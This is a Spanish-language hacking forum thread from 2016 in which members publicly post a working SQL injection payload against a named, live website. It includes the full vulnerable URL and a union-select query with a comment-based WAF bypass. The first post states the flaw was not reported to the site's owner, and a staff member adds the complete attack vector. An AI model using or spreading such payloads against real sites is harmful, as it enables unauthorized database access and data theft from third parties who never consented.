[SQLI] www.quicktrade.co.in

  • 2 Respuestas
  • 2516 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ---

  • *
  • Underc0der
  • Mensajes: 66
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

[SQLI] www.quicktrade.co.in

  • en: Agosto 03, 2016, 12:00:04 am
Aburrido y buscando algunas páginas me encontre unas cuantas con fallos..





Link: You are not allowed to view links. Register or Login
Payload: You are not allowed to view links. Register or Login*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+
Autor: Vasyyyl.
Reportado: No
« Última modificación: Agosto 03, 2016, 08:24:52 am por EPSILON »

Desconectado EPSILON

  • *
  • Ex-Staff
  • *****
  • Mensajes: 360
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • [email protected]
    • Ver Perfil

Re:[SQLI]www.quicktrade.co.in

  • en: Agosto 03, 2016, 08:22:56 am
Le falta información al post, no es suficiente con poner una comilla y mandar un pantallazo, tiene que ser completo, te invito a pasar por You are not allowed to view links. Register or Login reglas para saber como postear bien un bug encontrado, te falto el payload o vector de ataque como este:
Código: You are not allowed to view links. Register or Login
http://www.quicktrade.co.in/category_list.php?id=32+/*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+Incluso la web tiene un waf que hay que bypassear y no lo mencionaste, bueno ya edito el post y agrego lo que falta.

Saludos!, EPSILON

Desconectado ---

  • *
  • Underc0der
  • Mensajes: 66
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[SQLI] www.quicktrade.co.in

  • en: Agosto 03, 2016, 11:33:40 am
HOSTIAA es verdad! muchas gracias por añadirlo,se me habia olvidado. En los proximos reportes lo añadiré. Gracias @You are not allowed to view links. Register or Login  ;D